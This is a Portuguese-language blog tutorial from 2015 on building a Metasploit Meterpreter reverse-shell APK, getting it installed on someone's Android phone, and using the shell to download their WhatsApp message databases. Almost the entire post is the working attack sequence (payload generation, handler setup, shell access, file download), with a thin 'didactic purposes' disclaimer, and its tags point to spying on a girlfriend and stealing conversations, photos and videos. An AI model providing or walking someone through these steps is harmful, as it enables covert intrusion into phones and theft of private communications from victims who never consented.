01 maio 2015

Tutorial - invadindo Android e roubando banco de dados de usuários do WhatsApp


Atenção o tutorial abaixo pode não funcionar, recomendamos que teste. Não nos responsabilizamos pelos seus atos ou de nossos leitores - este artigo possui fins didáticos.

Utilizando uma distribuição Linux - como o Kali Linux por exemplo - é possível criar um backdoor para infectar aparelhos Android graças a um módulo disponível no Metasploit Framework.

Primeiro crie um payload e dê enter:

# msfpayload android/meterpreter/reverse_tcp LHOST=[ip] LPORT=[porta] R > nomedo.apk

Para saber o IP que deverá digitar em LHOST, digite em uma nova aba do terminal "ifconfig" e confira o ip da sua rede. Em LPORT você pode usar a porta 4444 ou outra, lembrando que a porta do seu modem/roteador precisa estar aberta.

Pronto, agora envie o arquivo gerado para o smartphone e instale - se vire amigo.

Depois de ter instalado o arquivo para o smartphone, volte ao terminal, digite "msfconsole" e vamos prosseguir com o seguinte comando:

# use exploit/multi/handler
# set PAYLOAD android/meterpreter/reverse_tcp
# set LHOST [ip]
# set LPORT [porta]
# exploit

Se ocorrer tudo certo, após digitar o comando "exploit" o Metasploit vai acusar conexão reversa e então abrirá automaticamente o Meterpreter. Então agora use o comando abaixo para abrir o shell interativo do terminal.

# shell

Depois, utilizando os comando abaixo você deve navegar até a pasta do WhatsApp chamada Databases - geralmente fica em: /sdcard/WhatsApp/Databases.

pwd - mostra em que local você está.
ls - mostra os arquivos de onde você está.
cd - é como se fosse o click de um mouse para abrir uma pasta.

Quando achar o local dos arquivos e anotar a localização dos arquivos, dê um "exit". Em seguida digite o seguinte comando abaixo para realizar o download dos arquivos:

download caminho/arquivo/vítima/arquivo /root/Desktop

Ali em cima onde está /root/Desktop é o local onde salvará os arquivos baixados.

Feito o download, você perceberá que os arquivos estão criptografados, o WhatsApp muda a criptografia periodicamente - por isto coloquei lá em cima do artigo "Atenção o tutorial abaixo pode não funcionar".

Sobre descriptografar, confira clicando aqui.

Fonte: shellzen.net

Tags: hacker, tutorial, dicas, Android, conexão, remoto, Whatsapp, descobrir conversas, capturar, roubar, invadir, namorada, imagens, fotos, vídeos, cracker, apk, Teste De Invasão, conversas, apk, backdoor, payload, Database (Software Genre),


Publicidade:


Related Posts Plugin for WordPress, Blogger...